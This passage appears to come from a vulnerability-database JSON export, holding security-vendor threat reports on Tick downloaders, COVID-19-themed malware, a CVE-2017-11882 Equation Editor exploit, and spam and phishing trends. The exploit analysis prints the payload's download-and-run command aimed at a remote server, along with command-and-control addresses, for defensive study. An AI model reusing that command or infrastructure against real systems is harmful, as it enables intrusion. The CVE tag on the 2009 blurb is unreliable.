discussion](<http://blogs.gartner.com/neil_macdonald/2009/03/18/should-microsoft-be-in-the-security-business/>) [gartner.com] about whether Microsoft should be in the security business. 
They include secure coding (obviously), secure functionality in the platform at no cost (of course), add-on security products at a fee (maybe) and paid cloud-based security services (sure).\n\nRead [the full blog post and take a stab at the questions](<http://blogs.gartner.com/neil_macdonald/2009/03/18/should-microsoft-be-in-the-security-business/>) MacDonald poses.\n\nImage [via Wonderlane](<http://www.flickr.com/photos/wonderlane/1378294362/>) (Flickr CC 2.0)\n", "cvss3": {}, "published": "2009-03-19T15:18:05", "type": "threatpost", "title": "Should Microsoft be in the security business?", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:36", "id": "THREATPOST:A9FAA9D15FCD97151072CF8CE16A42D9", "href": "https://threatpost.com/should-microsoft-be-security-business-031909/72395/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "carbonblack": [{"lastseen": "2019-12-11T13:20:10", "description": "Trend Micro released a white paper about Tick, a Chinese cyberespionage threat actor targeting East Asian countries. The report details several new downloader malware families. VMware Carbon Black Threat Analysis Unit (TAU) reviewed the malware and is providing product rules to detect and identify the malware.\n\n## Behavior Summary\n\nThe Trend Micro report stated that the downloaders were deployed by using the right-to-left override (RTLO) technique or by exploiting the CVE-2018-0802 and CVE-2018-0798 vulnerabilities. The downloaders have code which is used to detect antivirus products.\n\nThe CB ThreatHunter process diagram shows the downloader activity after it is deployed by the dropper. 
As the dropper only sets persistence, a reboot is required for the downloader to run.\n\nAdditionally, CB Defense will display the malware\u2019s overall triggered TTPs.\n\nTo learn more, [click here.](<https://community.carbonblack.com/t5/Threat-Research-Docs/TAU-TIN-Tick-downloaders-Operation-ENDTRADE/ta-p/83641>)\n\nThe post [Threat Analysis Unit (TAU) Threat Intelligence Notification: Tick Downloaders (Operation ENDTRADE)](<https://www.carbonblack.com/2019/12/10/threat-analysis-unit-tau-threat-intelligence-notification-tick-downloaders-operation-endtrade/>) appeared first on [VMware Carbon Black](<https://www.carbonblack.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-12-10T15:34:53", "type": "carbonblack", "title": "Threat Analysis Unit (TAU) Threat Intelligence Notification: Tick Downloaders (Operation ENDTRADE)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0798", "CVE-2018-0802"], "modified": "2019-12-10T15:34:53", "id": "CARBONBLACK:5FC3EC6D315A733A8D566BD7A42A12FE", "href": 
"https://www.carbonblack.com/2019/12/10/threat-analysis-unit-tau-threat-intelligence-notification-tick-downloaders-operation-endtrade/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-19T21:36:32", "description": "The global COVID-19 pandemic is generating a substantial uptick in the production and delivery of Coronavirus-themed malware. Due to a rapidly growing number of Indicators of Compromise (IOCs), this report covers the key behaviors by aligning to the MITRE ATT&CK Framework. \n\n[_MITRE ATT&CK_](<https://attack.mitre.org/>)_, launched in 2018, is a security framework that describes the various stages through which an attack will generally progress. The intent of the framework is to provide \u201cbetter detection of post-compromise cyber adversary behavior\u201d_. _This framework is gaining increased adoption in the security community and VMware Carbon Black actively maps our products to this framework to provide added context for our customers._\n\nPhishing emails are the primary source, which in turn manifest into harmful threats that include malicious attachments that deliver payloads to infect victim machines. Some recently observed payloads are delivering trojans, backdoors, remote access trojan (RAT) functionality, cryptominers and botnet participation. In one variant that was analyzed, the malware was found to overlap with the APT41 (also referred to as WINNTI) threat group which has traditionally been an APT actor based in China. Malicious functionality has also been observed in fake mobile apps, fake Coronavirus maps and fake VPN software. These recent observations show an increased overall risk to corporate as well as personal security, at a time when many countries and corporations are enforcing remote working. \n\n## **Background**\n\nThe COVID-19 global pandemic has created an unprecedented situation with far-reaching impacts on our daily lives. 
Many countries have encouraged or mandated social isolation, including working remotely, in an effort to contain the spread of the virus. Much is still unknown, leading to a climate of uncertainty. Unfortunately, during times of uncertainty and doubt, threat actors are ready to take advantage of the widespread desire to be informed. This is already happening with the Coronavirus. People and businesses who are already in a heightened state of emotion, and on overload with changes in all aspects of their lives, are now at risk from bad actors intent on stealing PII, sensitive information, payment details and more, simply by using luring tactics that feature Coronavirus themed malware. \n\nWhile this technique isn\u2019t new, history has proven that cyber crime often increases during times of heightened emotion, distraction and stress, such as certain religious or [festive](<https://www.bleepingcomputer.com/news/security/emotet-trojan-is-inviting-you-to-a-malicious-christmas-party/>) holidays, [elections](<https://www.darkreading.com/attacks-breaches/trump-themed-malware-dominating-threat-campaigns-this-election-season/d/d-id/1327211>), and even [Black Friday](<https://www.infosecurity-magazine.com/news/fake-black-friday-apps-cause/>) sales events. The actors exploit these challenging times to find avenues for distributing their malware. \n\nThis article aims to increase awareness of recently observed threats that are leveraging the COVID-19 pandemic by describing current examples in alignment with the MITRE ATT&CK Framework. MITRE ATT&CK has had a major impact on the cybersecurity industry due to its rapid adoption in the security community. Aligning to the MITRE ATT&CK Framework is important as there is a growing number of IOC\u2019s being produced daily. Historically, such as in the case of Emotet, handling such large volumes of IOC\u2019s can become overwhelming for defenders. 
Understanding the behavioral patterns of the different types of threats allows for easier interpretation and proactive defense. \n\nThe intent is to raise awareness for customers, SOC teams, IR partners, MSSPs and all defenders out in the InfoSec community, and to aid them with detection, protection and response of such malware we will be examining the types of attacks that appear to be most common.\n\nFor further information and resources pertaining to COVID-19, please refer to the VMware Carbon Black COVID-19: [Cybersecurity Community Resources](<https://www.carbonblack.com/2020/03/17/covid-19-cybersecurity-community-resources/>) page. \n\n## **Technical Analysis**\n\nIn the following section we will focus on the first two phases of the MITRE ATT&CK framework: **Initial Access** and **Execution**. We focus on these phases because we have observed the largest overlap from multiple actors that we are tracking. VMware Carbon Black\u2019s Threat Analysis Unit will continue to follow up with detailed analysis of individual actors and campaigns, digging deeper into the later stages of the attack.\n\nBefore we introduce these two tactic categories we would like to specifically highlight one of the most frequently leveraged techniques. [Masquerading (T1036)](<https://attack.mitre.org/techniques/T1036/>) occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. It is one of the key techniques employed in many of the observed threat types. While this may not come as a surprise, educating your end users, family and friends should be a priority during this unsettling time. Similar to campaigns that target religious or festive holidays, masquerading is the perfect tactic used by the bad actors, who have no regard for their victims. Their mission is clear, and masquerading helps them to evade defenses and get a few steps closer to achieving their goals. 
\n\n## **Initial Access **\n\nThis is the first tactic employed by bad actors whose hopes are to compromise as many vulnerable machines as possible. While many people and businesses are trying to share legitimate information related to COVID-19, the sheer volume of information being communicated lends itself to the delivery of fake data sheets, infographics, links to tracking maps, as well as fake software. The intent is to catch the end user off guard in order to deliver the malware. Other tactics could also include [drive-by compromise (T1189)](<https://attack.mitre.org/techniques/T1189/>) or [supply chain compromise (T1195)](<https://attack.mitre.org/techniques/T1195/>). The rationale behind this is due to the rapid registration of coronavirus themed domain names that have appeared on [MalwarePatrol.net](<https://www.malwarepatrol.net/>). The count at the time of writing is currently over 5000 registered domain names. Using Coronavirus or COVID-19 themed domain names could easily trick legitimate users into visiting websites and becoming subject to drive-by or supply chain compromise. The list can be found [here](<https://www.malwarepatrol.net/wp-content/uploads/2020/03/covid-19-domains.txt>). \n\n### [**Spearphishing Attachment - TID:T1193**](<https://attack.mitre.org/techniques/T1193/>)\n\nAttachments are a popular choice for obtaining initial infection. Observed attachment file types include, but are not limited to files with the following extensions: ZIP, 7Z, TAR, RAR, JAR, VBS, IMG, GZ, EXE, ISO, SCR, RTF, PDF, DOC, XLS. Examples of phishing emails may contain spoofed email headers and authentic messaging to lure the victim into a false sense of security. Attachment names observed also include names that are attention grabbing in order to arouse enough curiosity for the end user to feel the need to open it. Phishing emails can contain spelling, grammar or formatting mistakes, as shown in the example below. 
With that said, more advanced threat actors will be particularly good at producing an authentic looking email message, as we will see later in this report. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/1-Phishing-email-example-1.png>) \n\n\n**Figure 1: Phishing email example containing malicious Word document attachment**\n\nA common technique is to create interesting content for malicious Microsoft Office related email attachments in order to convince the user to click on a link. This typically will invoke the underlying malicious code embedded within the document, which is usually a malicious MS Office macro using VBA code. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/2-Phishing-email-example-1-Word-macro.png>) \n\n\n**Figure 2: Typical end-user prompt to trigger embedded payload**\n\nIn our next example we see an ISO file included as an attachment. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/3-Phishing-email-example-2.png>) \n\n\n**Figure 3: Phishing email example containing malicious ISO file attachment**\n\nThe ISO attachment contains an SCR file which is actually a PE file. When executed, the PE file deploys RemCos, a prolific RAT which is being continually updated and sold on the Dark Web. The flow diagram below gives a visual representation of the underlying effects of opening this particular email attachment. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/4-CBD-Flow-SCR.png>) \n\n\n**Figure 4: Partial process flow diagram taken from VMware Carbon Black Endpoint Standard**\n\nIn the next example, a PDF attachment contains a clickable link which redirects the user to an external site hosting a PHP page. 
\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/5-PDF-attachment-example-1.png>) \n\n\n**Figure 5: Example PDF Attachment containing clickable link**\n\nIf the user clicks the link within the PDF, they are presented with a fake Office365 landing page masquerading as a legitimate Office365 page. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/6-PDF-attachment-fake-Office-365-page.png>) \n\n\n**Figure 6: Fake Office365 landing page**\n\nAfter the user clicks on the \u201cdownload file\u201d button, they are presented with a fake Office365 login prompt which harvests any details entered by the end user. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/7-PDF-attachment-fake-Office-365-creds.png>) \n\n\n**Figure 7: Fake Office365 login prompt**\n\nIn the next example an attachment named **ALL UPDATED INFORMATION FROM CDC ON COVID-19 IN YOUR AREA.7z** contains an executable, which when opened deploys **AgentTesla**. AgentTesla is used by threat actors to record keystrokes and other sensitive information, and to receive them via their C2 channel. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/8-7z-example.png>) \n\n\n**Figure 8: 7z file containing executable**\n\nAnother example uses an attachment named **AWARENESS NOTICE ON CORONAVIRUS COVID-19 DOCUMENT_pdf.exe**, which when opened launches [RegAsm (T1121)](<https://attack.mitre.org/techniques/T1121/>) to deliver **Lokibot**, another popular and highly effective information stealer. This attachment contains an embedded AutoIT script to deliver the main payload. 
\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/9-AutoIT-obfuscated-script.png>) \n\n\n**Figure 9: Snippet of hex dump showing obfuscated AutoIT script embedded in PE file**\n\nAnother attachment named COVID-19.INFO.37842702.doc installs a trojan by leveraging [PowerShell (T1086)](<https://attack.mitre.org/techniques/T1086/>) and CSCRIPT (a technique used for [signed script proxy execution (T1216)](<https://attack.mitre.org/techniques/T1216/>)) to launch a VBS file, which is a common [scripting (T1064)](<https://attack.mitre.org/techniques/T1064/>) technique. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/10-trojan-example.png>) \n\n\n**Figure 10: Execution path displayed within VMware Carbon Black EDR**\n\n## Execution\n\n[User execution (T1204)](<https://attack.mitre.org/techniques/T1204/>) is symptomatic of when an end user opens a phishing email or attachment. There are other specific TTP\u2019s that have been observed with the execution of Coronavirus themed payloads. \n\n### [PowerShell (T1086):](<https://attack.mitre.org/techniques/T1086/>)\n\nWhen a particular MS Word document attachment named \u201c**CORONA VIRUS REMEDY ISREAL.doc**\u201d is opened, it executes an obfuscated command within a hidden PowerShell window. This in turn invokes two signed Microsoft binaries: **csc.exe** and **cvtres.exe**, which are commonly seen in the defense evasion, [compile after delivery (T1500)](<https://attack.mitre.org/techniques/T1500/>) tactic. These types of behaviours are commonly seen in commodity malware, and are highly effective at delivering and compiling a payload using legitimate Windows binaries. 
\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/11-Powershell-snippet.png>) \n\n\n**Figure 11: Snippet of obfuscated Powershell command**\n\n### [Dynamic Data Exchange (T1173):](<https://attack.mitre.org/techniques/T1173/>)\n\nMalicious MS Office documents still manage to successfully exploit unpatched versions of MS Office due to the typical DDE vulnerabilities. Some of these common CVE\u2019s are: [CVE-2012-0158](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-027#mscomctlocx-rce-vulnerability---cve-2012-0158>), [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) and [CVE-2018-0798](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0798>). \n\nIn a recent Coronavirus themed MS Word document attachment, MS Word is the target for [exploitation for client execution (T1203)](<https://attack.mitre.org/techniques/T1203/>) using DDE exploits to launch the MS Equation Editor. The purpose is to deliver and execute a [signed binary proxy execution (T1218)](<https://attack.mitre.org/techniques/T1218/>), which in this instance was found to overlap with the APT41 (also referred to as WINNTI) threat group which has traditionally been an APT actor based in China. The VMware Carbon Black TAU team is still investigating this particular threat.\n\n## **More on Masquerading**\n\nMasquerading has been highlighted so far in relation to malicious phishing email attachments. Unfortunately third party software is not excluded from this. There is evidence to suggest that the following categories of software are being weaponised in order to target potential victims. 
\n\n### Fake VPN clients/installers:\n\nA recent [report](<https://www.bleepingcomputer.com/news/security/azorult-malware-infects-victims-via-fake-protonvpn-installer/>) highlights the fact that while many people globally adapt to working from home for the foreseeable future, there is a growing number of fake VPN clients and installers that are actually malware in disguise. The example discussed in the report delivers the AZORult malware via a fake ProtonVPN client, whereby post-execution the victim machine becomes part of the AZORult botnet. \n\n### Remote meeting software:\n\nTAU are currently monitoring for the appearance of weaponized or fake remote meeting software. TAU are anticipating that there may be an eventual increase over the coming weeks as more people around the world rely on remote working. \n\n### Mobile apps:\n\nAvast have recently [released](<https://www.apklab.io/covid19>) a repository for researchers and defenders due to the growing number of apps that have appeared for Android users. In a recent [report](<https://www.domaintools.com/resources/blog/covidlock-update-coronavirus-ransomware>), a fake Android Coronavirus app was discovered to be delivering ransomware. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/12-fake-mobile-apps.png>) \n\n\n**Figure 12: Snippet showing potentially malicious and fake apps**\n\n### Fake Coronavirus maps:\n\nIn a report published recently, a fake Coronavirus map was discovered which silently steals passwords, crypto wallets and other sensitive information. 
\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/13-Coronavirus-map.png>)\n\n**Figure 13: Malicious fake Coronavirus map**\n\n## **Ransomware**\n\n[Data encrypted for impact (T1486)](<https://attack.mitre.org/techniques/T1486/>) is observed with a new family of ransomware known as Coronavirus which was recently [reported](<https://www.bleepingcomputer.com/news/security/new-coronavirus-ransomware-acts-as-cover-for-kpot-infostealer/>). TAU has observed an upward trend in ransomware for some time now, but sadly there has never been a better time for the threat actors to create and distribute ransomware. Ransomware is an ongoing and continual threat which TAU observes very closely. A full write up will be published soon on this new ransomware campaign. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/14-Coronavirus-ransomware.png>) \n\n\n**Figure 14: Coronavirus ransomware message**\n\n## **Summary**\n\nThe threats that we are seeing that leverage the COVID-19 pandemic are varied, but primarily familiar. The key here is that the uncertainty and thirst for knowledge about the global pandemic, coupled with the response of working remotely, create new opportunities for exploitation. It may seem obvious, but masquerading and user execution are the two behaviors seen across most of the recently observed threats. While some public lists containing IOC\u2019s do exist, the current global situation could result in a significant increase in cyber attacks. The jump in IOC\u2019s may shortly become unmanageable. Understanding the behaviors, and leveraging the MITRE ATT&CK Framework, will help to detect and mitigate such threats. While Coronavirus themed malware includes a variety of different threats, many of the techniques are seen with regular commodity based malware. As ever, a layered approach should be taken to reduce the risk of such threats. 
Defenders should be extra vigilant in not only staying up to date with future Coronavirus related threats, but also advising their family, friends and colleagues of such threats. \n\n## **Indicators of Compromise (IOC\u2019s)**\n\nPlease refer to the VMware Carbon Black TAU [Github](<https://github.com/carbonblack/tau-tools/tree/master/threat_hunting/IOCs/COVID-19%20Post%20IOCs>) page for a list of IOC\u2019s.\n\nThe post [Technical Analysis: Hackers Leveraging COVID-19 Pandemic to Launch Phishing Attacks, Fake Apps/Maps, Trojans, Backdoors, Cryptominers, Botnets & Ransomware](<https://www.carbonblack.com/2020/03/19/technical-analysis-hackers-leveraging-covid-19-pandemic-to-launch-phishing-attacks-trojans-backdoors-cryptominers-botnets-ransomware/>) appeared first on [VMware Carbon Black](<https://www.carbonblack.com>).", "edition": 2, "cvss3": {}, "published": "2020-03-19T20:48:06", "type": "carbonblack", "title": "Technical Analysis: Hackers Leveraging COVID-19 Pandemic to Launch Phishing Attacks, Fake Apps/Maps, Trojans, Backdoors, Cryptominers, Botnets & Ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0798"], "modified": "2020-03-19T20:48:06", "id": "CARBONBLACK:F60F48DF14A6916346C8A04C16AFB756", "href": "https://www.carbonblack.com/2020/03/19/technical-analysis-hackers-leveraging-covid-19-pandemic-to-launch-phishing-attacks-trojans-backdoors-cryptominers-botnets-ransomware/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2017-11-22T20:03:27", "description": "On November 20, 2017, the exploit for [CVE-2017-11882](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882>) was publicly released, which allowed for code execution in vulnerable versions of Microsoft\u2019s Equation Editor. \n\nCVE-2017-11882 affects the following versions of Microsoft Office:\n\n * Microsoft Office 2007 Service Pack 3\n * Microsoft Office 2010 Service Pack 2\n * Microsoft Office 2013 Service Pack 1\n * Microsoft Office 2016 \n\n[Microsoft Equation Editor,](<https://support.office.com/en-us/article/Equation-Editor-6eac7d71-3c74-437b-80d3-c7dea24fdf3f>) which is a Microsoft Office component, contains a stack buffer overflow that allows remote code execution on a vulnerable system. Microsoft Equation Editor is an out-of-process COM server that is hosted by eqnedt32.exe. \n\nDEP and ASLR should protect against such attacks; however, because of the manner in which eqnedt32.exe was linked, it will not utilize these features, subsequently allowing code execution. Being an out-of-process COM server, protections specific to Microsoft Office such as EMET and Windows Defender Exploit Guard are not applicable to eqnedt32.exe, unless applied system-wide. This provides the attacker with an avenue to lure targets into clicking on a specially crafted document, resulting in the ability to execute an embedded attacker command. \n\n> In the sample analyzed, ultimately a Cobalt Strike payload was dropped on the compromised system. However as the exploitation of this CVE continues to gain traction, practitioners can expect other families to be used. \n> \n> The Carbon Black Threat Analysis Unit (TAU) expects this vulnerability to be actively exploited in both spam and spearphishing campaigns, over the next quarter. 
\n> \n> The graphic below highlights the overall process, which is detailed in the technical analysis section.\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2017/11/Figure_1.jpg>)\n\n_Figure 1: Process Overview_\n\nTechnical analysis of a sample utilizing CVE-2017-11882 is detailed in the below. The Carbon Black TAU created a [separate document for customers](<https://community.carbonblack.com/community/resources/threat-research/blog/2017/11/22/tau-tin-cve-2017-11882>), which details how they can utilize Carbon Black products to protect themselves against this type of attack.\n\n# Technical Analysis\n\n### **Malicious Document - Stage One**\n\nFile Name : \u0418\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u043f\u0440\u0430\u0432\u0438\u043b \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0435\u0440\u0435\u0432\u043e\u0434\u043e\u0432.rtf \nFile Name 1 : account details.rtf \nFile Name 2 : news.swift.rtf \nFile Size : 31,811 \nCRC32 : c326285e \nMD5 : f360d41a0b42b129f7f0c29f98381416 \nSHA1 : 245b867e578e9df12877df07017338863a5fdc59 \nSHA256 : 17f9db18327a29777b01d741f7631d9eb9c7e4cb33aa0905670154a5c191195c \n \n--- \n \n_Table 1: Sample metadata_\n\nThe initial document contains a malicious equation that exploits the [CVE-2017-11882](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882>) vulnerability. The exploit allows a crafted document to execute a command (with a maximum length of 44 bytes) via a call to the WinExec API. This exploit was released and documented in [this post](<https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about>). 
The command will call cmd.exe to download and execute a payload from a remote system, which is displayed in the table below.\n\nOffset 0 1 2 3 4 5 6 7 8 9 A B C D E F\n\n00000940 0A 0A 01 08 5A 5A 63 6D 64 20 2F 63 20 ZZcmd /c \n00000950 73 74 61 72 74 20 5C 5C 31 33 38 2E 36 38 2E 32 start \\\\\\138.68.2 \n00000960 33 34 2E 31 32 38 5C 77 5C 77 2E 65 78 65 20 26 34.128\\w\\w.exe & \n00000970 41 41 41 41 41 12 0C 43 AAAAA C \n \n--- \n \n_Table 2: Embedded Command_\n\nIt should be noted that the payload in this document matches (with the only differences being the command itself) the object_data template and object_trailer from a [Proof of Concept for CVE-2017-11882](<https://github.com/embedi/CVE-2017-11882/blob/master/webdav_exec_CVE-2017-11882.py>).\n\n### **Dropper - Stage Two**\n\nStage two of the attack chain contains a dropper with the final payload as a resource. The dropper is wrapped in a custom packer and then wrapped again in UPX. Once through the packers, the dropper prepares the third stage of the chain by finding it in the binary resource section as C132\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2017/11/Figure_2.jpg>)\n\n_Figure 2: Load Resource_\n\nNext, the dropper searches for wmplayer.exe in the expected 32 and 64-bit locations.\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2017/11/Figure_3.jpg>)\n\n_Figure 3: wmplayer.exe search_\n\nWmplayer.exe is created as a suspended process and the stage three DLL is injected into it and instructed to run. 
Finally, the dropper executes a command to delete the stage two dropper and exits.\n\ncmd.exe /C Del <path_to_original_dropper> \n \n--- \n \n_Table 3: Clean up command_\n\n### **Backdoor - Stage Three**\n\nThe final stage is a Cobalt Strike backdoor that connects back to the C&C server at:\n\n * https://104.144.207.207\n * /j.ad\n * /submit.php\n * User-Agent\n * Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)\n\nThis final payload allows the attacker full control over the system. The backdoor is capable of executing arbitrary commands from the C2 server as well as injecting additional payloads into memory using the ReflectiveLoader export of the DLL.\n\n# Conclusion\n\nSpam campaigns do their best to take advantage of the latest and most modular types of attacks, using the most recent vulnerabilities in order to maximize their effectiveness against the largest number of targets. The Carbon Black TAU is constantly monitoring the threat landscape in order to provide the community and our customers with the latest trends and IOCs to increase security across the board. \n\nIn order to decrease the likelihood of infection, everyone should ensure that the latest security updates are installed and users should not open suspicious documents that they are not expecting. 
\n\n# Indicators\n\n**Indicator** | **Type** | **Context**\n---|---|---\n138.68.234.128 | IP | Payload Delivery Server\n104.144.207.207 | IP | Command and Control Server\nd46df9eacfe7ff75e098942e541d0f18 | MD5 | Payload (w.exe)\n60656140e2047bd5aef9b0568ea4a2f7c8661a524323111099e49048b27b72c7 | SHA256 | Payload (w.exe)\n86d739651881c01cfe5ce6867df3025a | MD5 | Cobalt Strike (final) Backdoor\n5f777cbad221cb2d89c59ff84ced2fd278d6d220c3cfc13e3fb8e2ca38698e0f | SHA256 | Cobalt Strike (final) Backdoor\n\nThe post [Threat Analysis: Equation Equals Backdoor](<https://www.carbonblack.com/2017/11/22/threat-analysis-exploit-allows-for-code-execution-in-vulnerable-versions-of-microsofts-equation-editor/>) appeared first on [Carbon Black](<https://www.carbonblack.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-11-22T18:50:11", "type": "carbonblack", "title": "Threat Analysis: Equation Equals Backdoor", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2017-11882"], "modified": "2017-11-22T18:50:11", "id": "CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD", "href": "https://www.carbonblack.com/2017/11/22/threat-analysis-exploit-allows-for-code-execution-in-vulnerable-versions-of-microsofts-equation-editor/", "cvss": {"score": 0.0, "vector": "NONE"}}], "securelist": [{"lastseen": "2023-02-16T08:14:22", "description": "\n\n## Figures of the year\n\nIn 2022:\n\n * 48.63% of all emails around the world and 52.78% of all emails in the Russian segment of the internet were spam\n * As much as 29.82% of all spam emails originated in Russia\n * Kaspersky Mail Anti-Virus blocked 166,187,118 malicious email attachments\n * Our Anti-Phishing system thwarted 507,851,735 attempts to follow phishing links\n * 378,496 attempts to follow phishing links were associated with Telegram account hijacking\n\n## Phishing in 2022\n\n### Last year's resonant global events\n\nThe year 2022 saw cybercrooks try to profit from new film releases and premieres just as they always have. The bait included the most awaited and talked-about releases: the new season of Stranger Things, the new Batman movie, and the Oscar nominees. Short-lived phishing sites often offered to see the premieres before the eagerly awaited movie or television show was scheduled to hit the screen. Those who just could not wait were in for a disappointment and a waste of cash. The promises of completely free access to the new content were never true. By clicking what appeared to be a link to the movie, the visitor got to view the official trailer or a film studio logo. Several seconds into the "preview", the stream was interrupted by an offer to buy an inexpensive subscription right there on the website to continue watching. 
If the movie lover entered their bank card details on the fake site, they risked paying more than the displayed amount for content that did not exist and sharing their card details with the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132238/spam-phishing-report-2022-01.png>)\n\nSome websites that offered soccer fans free broadcasts of the FIFA World Cup in Qatar employed a similar scheme, but the variety of hoaxes aimed at soccer fans proved to be wider than that used by scammers who attacked film lovers. Thus, during the World Cup a brand-new scam appeared: it offered users to win a newly released iPhone 14 for predicting match outcomes. After answering every question, the victim was told that they were almost there, but there was a small commission to be paid before they could get their gadget. Of course, no prize ensued after the fee was paid.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132326/spam-phishing-report-2022-02.jpg>)\n\nSoccer fans chasing merchandise risked compromising their bank cards or just losing some money. Scammers created websites that offered souvenirs at low prices, including rare items that were out of stock in legitimate online stores. Those who chose to spend their money on a shady website risked never getting what they ordered.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132414/spam-phishing-report-2022-03.jpg>)\n\nWebsites that offered tickets to the finals were another type of soccer-flavored bait. Scammers were betting on the finals typically being the most popular stage of the competition, tickets to which are often hard to get. Unlike legitimate ticket stores, the fake resellers were showing available seats in every sector even when the World Cup was almost closed. 
The vast selection of available seats should have alarmed visitors: real tickets would have been largely gone.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132716/spam-phishing-report-2022-04.png>)\n\nFake donation sites started popping up after the Ukraine crisis broke out in 2022, pretending to accept money as aid to Ukraine. These sites referenced public figures and humanitarian groups, offering to accept cash in cryptocurrency, something that should have raised a red flag in itself.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132903/spam-phishing-report-2022-05.png>)\n\n### The pandemic\n\nThe COVID-19 theme had lost relevance by late 2022 as the pandemic restrictions had been lifted in most countries. At the beginning of that year, we still observed phishing attacks that used the themes of infection and prevention as the bait. For example, one website offered users the chance to obtain a COVID vaccination certificate by entering their British National Health Service (NHS) account credentials. Others offered the coveted Green Pass without vaccination.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141812/spam-phishing-report-2022-06.png>)\n\nScammers abused legitimate survey services by creating polls in the name of various organizations to profit from victims' personal, including sensitive, data. In another 